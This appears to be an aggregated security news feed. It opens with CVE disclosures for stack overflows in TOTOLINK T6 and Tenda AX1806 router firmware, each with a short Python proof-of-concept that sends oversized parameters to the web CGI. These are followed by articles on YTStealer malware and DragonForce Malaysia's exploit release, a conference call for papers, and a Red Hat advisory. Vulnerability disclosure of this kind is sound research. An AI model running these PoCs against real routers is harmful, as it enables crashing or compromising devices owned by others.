TOTOLINK T6 V4.1.9cu.5179_B20201015 was discovered to contain a stack overflow via the desc, week, sTime, eTime parameters in the function FUN_004133c4.

The vulnerability exists in the router's WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_004133c4 (at address 0x4133c4) gets the JSON parameter desc, week, sTime, eTime, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:

from pwn import \*
import json

data \= {
    "topicurl": "setting/setParentalRules",
    "addEffect": "0",
    "mac": "12:34:56:78",
    "desc": 'A'\*0x400,
    "week": 'A'\*0x400,
    "sTime": 'A'\*0x400,
    "eTime": 'A'\*0x400
}

data \= json.dumps(data)
print(data)

argv \= \[
    "qemu-mipsel-static",
    "-g", "1234",
    "-L", "./root/",
    "-E", "CONTENT\_LENGTH={}".format(len(data)),
    "-E", "REMOTE\_ADDR=192.168.2.1",
    "./cstecgi.cgi"
\]

a \= process(argv\=argv)
a.sendline(data.encode())

a.interactive()

CVE-2022-32051: IoT-vuln/Totolink/T6-v2/2.setParentalRules at main · d1tto/IoT-vuln

TOTOLINK T6 V4.1.9cu.5179_B20201015 was discovered to contain a stack overflow via the cloneMac parameter in the function FUN_0041af40.

The vulnerability exists in the router's WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_0041af40 (at address 0x41af40) gets the JSON parameter cloneMac, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:

from pwn import \*
import json

data \= {
    "topicurl": "setting/setWanCfg",
    "proto": "0",
    "staticIp": "192.168.2.1",
    "staticMask": "255.255.255.0",
    "staticGw": "192.168.2.1",
    "staticMtu": "0",
    "cloneMac": "A"\*0x400
}

data \= json.dumps(data)
print(data)

argv \= \[
    "qemu-mipsel-static",
    "-g", "1234",
    "-L", "./root/",
    "-E", "CONTENT\_LENGTH={}".format(len(data)),
    "-E", "REMOTE\_ADDR=192.168.2.1",
    "./cstecgi.cgi"
\]

a \= process(argv\=argv)
a.sendline(data.encode())

a.interactive()

CVE-2022-32050: IoT-vuln/Totolink/T6-v2/9.setWanCfg at main · d1tto/IoT-vuln

TOTOLINK T6 V4.1.9cu.5179_B20201015 was discovered to contain a stack overflow via the cloneMac parameter in the function FUN_0041621c.

The vulnerability exists in the router's WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_0041621c (at address 0x41621c) gets the JSON parameter cloneMac, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:

When parameter proto is equal to 1, program will enter the danger if branch at line 125. Then the program gets the parameter cloneMac, splits it, and connects the segmented string to local variables in the stack without checking its length.

from pwn import \*
import json

data \= {
    "topicurl": "setting/setWizardCfg",
    "proto": "1",
    "cloneMac": "A"\*0x400 + ":" + "A"
}

data \= json.dumps(data)
print(data)

argv \= \[
    "qemu-mipsel-static",
    "-g", "1234",
    "-L", "./root/",
    "-E", "CONTENT\_LENGTH={}".format(len(data)),
    "-E", "REMOTE\_ADDR=192.168.2.1",
    "./cstecgi.cgi"
\]

a \= process(argv\=argv)
a.sendline(data.encode())

a.interactive()

CVE-2022-32053: IoT-vuln/Totolink/T6-v2/6.setWizardCfg at main · d1tto/IoT-vuln

TOTOLINK T6 V4.1.9cu.5179_B20201015 was discovered to contain a stack overflow via the desc parameter in the function FUN_004137a4.

The vulnerability exists in the router's WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_004137a4 (at address 0x4137a4) gets the JSON parameter desc, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:

from pwn import \*
import json

data \= {
    "topicurl": "setting/setWiFiAclRules",
    "addEffect": "1",
    "mac": "12:34:56:78",
    "desc": 'A'\*0x500,
}

data \= json.dumps(data)
print(data)

argv \= \[
    "qemu-mipsel-static",
    "-g", "1234",
    "-L", "./root/",
    "-E", "CONTENT\_LENGTH={}".format(len(data)),
    "-E", "REMOTE\_ADDR=192.168.2.1",
    "./cstecgi.cgi"
\]

a \= process(argv\=argv)
a.sendline(data.encode())

a.interactive()

CVE-2022-32052: IoT-vuln/Totolink/T6-v2/3.setWiFiAclRules at main · d1tto/IoT-vuln

TOTOLINK T6 V4.1.9cu.5179_B20201015 was discovered to contain a stack overflow via the desc parameter in the function FUN_0041880c.

The vulnerability exists in the router's WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_0041880c (at address 0x41880c) gets the JSON parameter desc, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:

from pwn import \*
import json

data \= {
    "topicurl": "setting/setMacFilterRules",
    "addEffect": "1",
    "enable": "1",
    "mac": "00:00:00:00:00:00",
    "desc": 'A'\*0x400
}

data \= json.dumps(data)
print(data)

argv \= \[
    "qemu-mipsel-static",
    "-g", "1234",
    "-L", "./root/",
    "-E", "CONTENT\_LENGTH={}".format(len(data)),
    "-E", "REMOTE\_ADDR=192.168.2.1",
    "./cstecgi.cgi"
\]

a \= process(argv\=argv)
a.sendline(data.encode())

a.interactive()

CVE-2022-32046: IoT-vuln/Totolink/T6-v2/8.setMacFilterRules at main · d1tto/IoT-vuln

Tenda AX1806 v1.0.0.1 was discovered to contain a stack overflow via the deviceList parameter in the function formAddMacfilterRule.

**Overview**

*   The device's official website: https://www.tenda.com.cn/product/A18.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-2760.html

**Affected version**

V15.13.07.09

**Vulnerability details**

httpd in the /bin directory has a stack overflow vulnerability. The vulnerability is in the formAddMacfilterRule function. This function takes the POST argument deviceList and passed it to function parse_macfilter_rule. parse_macfilter_rule copies it to the memory pointed by the second argument without checking the length. The memory that this second argument points to is the stack of the formAddMacfilterRule function.

**PoC**

import requests

data \= {
    b"deviceList": b'A'\*0x200 + b'\\r'
}

requests.post("http://127.0.0.1/goform/setBlackRule", data \= data)

CVE-2022-32032: IoT-vuln/Tenda/A18/formAddMacfilterRule at main · d1tto/IoT-vuln

We take a look at reports of scammers targeting Youtuber's channels with malware called YTStealer, that eats authentication cookies.
The post YTStealer targets YouTube content creators appeared first on Malwarebytes Labs.

Researchers are reporting the discovery of malware targeting YouTub content creators. The aim is to compromise accounts and then take over the victims’ channels completely.

The malware, dubbed YTStealer, has one game plan: Grabbing authentication cookies. A site gives you an authentication cookie when you log in, and your browser then uses it in place of a password until you log out. If somebody can steal the authentication cookie from your browser they can use it log into whatever website you’re using, as if they are you.

Armed with YouTube cookies, YTStealer plunders YouTube accounts, and their real owners have some customer support chats waiting in their immediate future.

**Targeting interests**

How do malware distributors reel in YouTube channel owners in the first place? Like so many of these scams, they promote a variety of bogus applications designed to lure victims. The rogue apps don’t just install YTStealer though, they also drop several other malicious files, depending on which installer is used. Vidar and RedLine may also be present.

Several popular (fake) versions of editing and design tools, which would naturally appeal to people in video circles, are on offer. Adobe Premiere Pro, HitFilm Express, and Filmora are some of the fake installers mentioned.

Games, too, are a popular revenue stream on YouTube with game streamers and reviewers galore. No surprise, then, that fake installers and cheats for titles like Call of Duty and Grand Theft Auto are along for the ride.

The final group of bogus files relate to imitation security products and supposed cracks for Discord Nitro and Spotify Premium.

**System checks and balances**

Once installed on a target machine, YTStealer performs some checks to see if its running inside of a virtual machine. This is to see if the malware is being analysed by security researchers. If detection takes place, files like YTStealer will typically terminate or become incredibly stubborn.

With this out of the way, YTStealer proceeds to harvest authentication cookies and fire up a browser in “headless” mode (a browser with no windows to look at). In other words: A silent, invisible browser. The victim is completely unaware of what’s happening. Swiped cookies are loaded into the phantom browser, which can now log in to YouTube as the victim.

The malware harvests the victim’s subscriber count, channel name, age of channel, verification status, and whether or not the channel is monetised. The data is collected, encrypted, and sent to the Command and Control (C2) server tied to the malware.

**How to avoid malware aimed at Youtubers**

*   Scammers will target your interests, and try to interest you in cheap / free copies of software related to the content you create. Is a stranger really going to give you free editing tools worth a few hundred dollars? Almost certainly not. “If it sounds too good to be true,” and all that.
*   Many of these files insist you turn off security protection prior to installing. Ask yourself why they’d want you to do this, and then make a sharp exit.
*   Are they directing you to a YouTube channel of their own for the download links? Check the comments. Are they disabled? Is every single comment positive, and posted from new / low quality accounts? There’s a reason for that…
*   Free cheat tools advertised on YouTube are not going to work. Bypassing anti-cheat protection in major video game titles is big business, and people pay to use these tools. Anything given away for free in this manner will do little beyond infect your system.

YTStealer targets YouTube content creators

The hacktivist group is ramping up its activities and ready to assault governments and businesses with escalating capabilities.

The hacktivist group DragonForce Malaysia has released an exploit that allows Windows Server local privilege escalation (LPE) to grant access to local distribution router (LDR) capabilities. It also announced that it's adding ransomware attacks to its arsenal.  

The group posted a proof of concept (PoC) of the exploit on its Telegram channel on June 23, which was subsequently analyzed by CloudSEK this week. While there's no known CVE for the bug, the group claims that the exploit can be used to bypass authentication "remotely in one second" in order to access the LDR layer, which is used to interconnect local networks at various locations of an organization.

The group says it would be using the exploit in campaigns targeted at businesses operating in India, which falls directly within its wheelhouse. During the past three months, DragonForce Malaysia has launched several campaigns targeting numerous government agencies and organizations across the Middle East and Asia.

“DragonForce Malaysia is adding to a year that will long be remembered for geopolitical unrest," says Daniel Smith, head of research for Radware’s cyber threat intelligence division. "In combination with other hacktivists, the threat group has successfully filled the void left by Anonymous while remaining independent during the resurgence of hacktivists related to the Russian/Ukrainian war."

The most recent, dubbed "OpsPatuk" and launched in June, has already seen several government agencies and organizations across the country targeted by data leaks and denial-of-service attacks, with the number of defacements topping 100 websites.

“DragonForce Malaysia is expected to continue defining and launching new reactionary campaigns based on their social, political, and religious affiliations for the foreseeable future," Smith says. "The recent operations by DragonForce Malaysia ... should remind organizations worldwide that they should remain vigilant during these times and aware that threats exist outside the current cyber conflict in Eastern Europe.”

**Why LPE Should Be on the Patching Radar**

While not as flashy as remote code execution (RCE), LPE exploits provide a path from a normal user to SYSTEM, essentially the highest privilege level in the Windows environment. If exploited, LPE vulnerabilities not only allow an attacker a step in the door but also provide local admin privileges — and access to the most sensitive data on the network.

With this heightened level of access, attackers can make system modifications, recover credentials from stored services, or recover credentials from other users who are using or have authenticated to that system. Recovering other users' credentials can allow an attacker to impersonate those users, providing paths for lateral movement on a network.

With escalated privileges, an attacker can also perform admin tasks, execute malware, steal data, execute a backdoor to gain persistent access, and much more.

Darshit Ashara, principal threat researcher for CloudSEK, offers one sample attack scenario.

“The attacker from the team can easily exploit any simple Web application-based vulnerability to gain aninitial foothold and place a Web-based backdoor,” Ashara says. “Usually, the machine on which Web server is hosted will have user privilege. That is where the LPE exploit will enable the threat actor to gain higher privileges and compromise not only a single website but other websites hosted on the server.”

**LPE Exploits often Remain Unpatched**

Tim McGuffin, director of adversarial engineering at LARES Consulting, an information-security consulting firm, explains that most organizations wait to patch LPE exploits because they typically require initial access to the network or endpoint in the first place.

“A lot of effort is placed on the initial prevention of access, but the further you move into the attack chain, the lesser effort is placed on tactics like privilege escalation, lateral movement, and persistence,” he says. “These patches are typically prioritized and patched on a quarterly basis and do not use an emergency 'patch now' process.”

Nicole Hoffman, senior cyber threat intelligence analyst at Digital Shadows, notes that the importance of every vulnerability is different, whether it's LPE or RCE.

“Not all vulnerabilities can be exploited, meaning not every vulnerability requires immediate attention. It is a case-by-case basis,” she says. “Several LPE vulnerabilities have other dependencies, such as needing a username and password to carry out the attack. That's not impossible to obtain but requires a higher level of sophistication.”

Many organizations also create local admin accounts for individual users, so they can carry out everyday IT functions such as installing their own software on their own machines, Hoffman adds.

“If many users have local admin privileges, it is more difficult to detect malicious local admin actions in a network,” she says. “It would be easy for an attacker to blend into normal operations due to poor security practices that are widely used.”

Any time an exploit is released into the wild, she explains, it doesn't take long before cybercriminals with varying levels of sophistication take advantage and perform opportunistic attacks.

“An exploit takes out some of this legwork,” she notes. “It is realistically possible mass scanning is already taking place for this vulnerability.”

Hoffman adds that vertical privilege escalation requires more sophistication and is typically more in line with advanced persistent threat (APT) methodologies.

**DragonForce Plans Shift to Ransomware**

In a video and through social-media channels, the hacktivist group also announced its plans to start conducting mass ransomware attacks. Researchers say this could be an adjunct to its hacktivist activities rather than a departure.

“DragonForce mentioned carrying out widespread ransomware attacks leveraging the exploit they created,” Hoffman explains. “The WannaCry ransomware attack was a great example of how widespread ransomware attacks all at the same time are challenging if financial gain is the end goal.”

She also points out that it is not uncommon to see these announcements from cybercriminal threat groups, as it draws attention to the group.

From the perspective of McGuffin, however, the public announcement of a shift in tactics is “a curiosity,” especially for a hacktivist group.

“Their motives may be more around destruction and denial of service and less around making a profit like typical ransomware groups, but they may be using the funding to enhance their hacktivist capabilities or awareness of their cause,” he says.

Ashara agrees that DragonForce’s planned shift is worth highlighting, as the group’s motive is to cause as much of an impact as possible, boost their ideology, and spread their message.

“Hence, the group's motivation with the announcement of ransomware is not for financial cause but to cause damage,” he says. “We have seen similar wiper malwares in the past where they would use ransomware and pretend the motivation is financial, but the root motivation is damage.”

DragonForce Malaysia Releases LPE Exploit, Threatens Ransomware

The call for papers for Hardwear.io NL 2022 is now open. It will take place October 27th through the 28th, 2021 in the Netherlands.

    *🐞 CFP for Hardwear.io NL 2022 is OPEN!*If you have groundbreaking embedded research or an awesome open-source toolyou’d like to showcase before the global hardware security community, thisis your chance. Send in your ideas on various hardware subjects, includingbut not limited to Chips, Processors, ICS/SCADA, Telecom, Protocols &Cryptography.CFP is open until: 15 August 2022Conference: 27-28 October 2022, The Hague (NL)✅ SUBMIT your research: https://hardwear.io/netherlands-2022/cfp.php➡️ Suggested Topics:Smart cards: identification, access controls, pay-TVIoT devices: automotive, medical, mobile payment, mobile-connected devicesTrusted computing: mobile TPM, Trusted Execution EnvironmentsEmbedded systems: Firmware, operating systems, memory, virtual machinesTrojans and backdoors: Counterfeit Detection and preventionAttacks and countermeasures:Side-channel, Fault Injection, EMFI, Tempest attacks and countermeasuresReverse engineering, (anti-)cloning, (anti-)tampering, (anti-)counterfeiting➡️ Questions? cfp@hardwear.ioWe look forward to seeing you at Hardwear.io NL 2022. Good luck!Team Hardwear.io <http://hardwear.io/>

Hardwear.io NL 2022 Call For Papers

Red Hat Security Advisory 2022-5439-01 - The redhat-virtualization-host packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host. Red Hat Virtualization Hosts are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks. Issues addressed include heap overflow, privilege escalation, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: RHV-H security update (redhat-virtualization-host) 4.3.23  
Advisory ID:       RHSA-2022:5439-01  
Product:           Red Hat Virtualization  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5439  
Issue date:        2022-06-30  
CVE Names:         CVE-2018-25032 CVE-2022-1271 CVE-2022-1966  
                   CVE-2022-24903  
====================================================================  
1. Summary:

An update for redhat-release-virtualization-host and  
redhat-virtualization-host is now available for Red Hat Virtualization 4  
for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

RHEL 7-based RHEV-H for RHEV 4 (build requirements) - noarch, x86_64  
Red Hat Virtualization 4 Hypervisor for RHEL 7 - noarch

3. Description:

The redhat-virtualization-host packages provide the Red Hat Virtualization  
Host.  
These packages include redhat-release-virtualization-host. Red Hat  
Virtualization Hosts (RHVH) are installed using a special build of Red Hat  
Enterprise Linux with only the packages required to host virtual machines.  
RHVH features a Cockpit user interface for monitoring the host's resources  
and performing administrative tasks.

Security Fix(es) from Bugzilla:

* zlib: A flaw found in zlib when compressing (not decompressing) certain  
inputs (CVE-2018-25032)

* gzip: arbitrary-file-write vulnerability (CVE-2022-1271)

* rsyslog: Heap-based overflow in TCP syslog server (CVE-2022-24903)

* kernel: a use-after-free write in the netfilter subsystem can lead to  
privilege escalation to root (CVE-2022-1966)

For more details about the security issue(s), including the impact, a CVSS  
score, and other related information, refer to the CVE page(s) listed in  
the References section.

Bug Fix(es) from Bugzilla:

* RHV-H 4.3 has been rebased on RHEL 7.9 batch (BZ#2084444)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/2974891

5. Bugs fixed (https://bugzilla.redhat.com/):

2067945 - CVE-2018-25032 zlib: A flaw found in zlib when compressing (not decompressing) certain inputs  
2073310 - CVE-2022-1271 gzip: arbitrary-file-write vulnerability  
2081353 - CVE-2022-24903 rsyslog: Heap-based overflow in TCP syslog server  
2084444 - Rebase RHV-H 4.3 on RHEL 7.9 batch  
2092427 - CVE-2022-1966 kernel: a use-after-free write in the netfilter subsystem can lead to privilege escalation to root

6. Package List:

Red Hat Virtualization 4 Hypervisor for RHEL 7:

Source:  
redhat-virtualization-host-4.3.23-20220622.0.el7_9.src.rpm

noarch:  
redhat-virtualization-host-image-update-4.3.23-20220622.0.el7_9.noarch.rpm

RHEL 7-based RHEV-H for RHEV 4 (build requirements):

Source:  
redhat-release-virtualization-host-4.3.23-1.el7ev.src.rpm  
redhat-virtualization-host-4.3.23-20220622.0.el7_9.src.rpm  
redhat-virtualization-host-productimg-4.3.23-1.el7.src.rpm

noarch:  
redhat-virtualization-host-image-update-4.3.23-20220622.0.el7_9.noarch.rpm  
redhat-virtualization-host-image-update-placeholder-4.3.23-1.el7ev.noarch.rpm

x86_64:  
redhat-release-virtualization-host-4.3.23-1.el7ev.x86_64.rpm  
redhat-virtualization-host-productimg-4.3.23-1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2018-25032  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-1966  
https://access.redhat.com/security/cve/CVE-2022-24903  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYr6VwdzjgjWX9erEAQjlUQ//St4jo4QoQbG6tiIa+jMGjKEXjz+aa4ui  
BtmQc+LbAzIjM1Wslf+7iuzU5A07CQ+fscVNXXTfmpGKjc5Ci6SaZUGgtk7hLdpt  
tLx2mY681n/J43C7QZM2ZeOjYVRjN+t8QHpenSiT0Aw41s23dUtD/4nXZfwRu74H  
1zily70MZP0Ukt+sbUn42Ry/fKGqJU2LVau/UPqxSkqUj3YskLXNSJmNN7+JVhKj  
y8z3C5AnYQtytv8QfRBXVvY58upTnN7gXPqLuA2IFnp82yQDmnkeqxl/ZGZoxUAD  
F31u0OV+9575GxDjYzaV2RomcBpkMHU//7Mo0RxTKfIPQp5MTZWGkrrMn3RFr4Yc  
DixfcCXfp9osc7LrL7kV7ZmvdfKxV7VlM3ja7PdKd+S1jRw7Ol6MfgInUWhbWt4t  
T9y1abRa3YWliSJaTI7IxMM3fH8Smtcozr90+G7pk+MFFAPbw+2VK7yScS+Rpl72  
zm+5Bkz/pkpBGEWSXNvJNeTc1xBfZnPTDI2UnX1495mLTpAyK5JhwRp+LvtuMFm+  
maVds4CpAssAQvM8tEU9qJdXvzMT9W7jXpzr6QK7C90F6f590Yc4OElJUp/hGYSL  
PvaYkhRrZShMJBgPdZnBFeEZkM8f4b+FkBU4WLAJF8Me+Wiodm4mKNRZSXBuDfDo  
vlSrwW/9s7I=u0ws  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#mac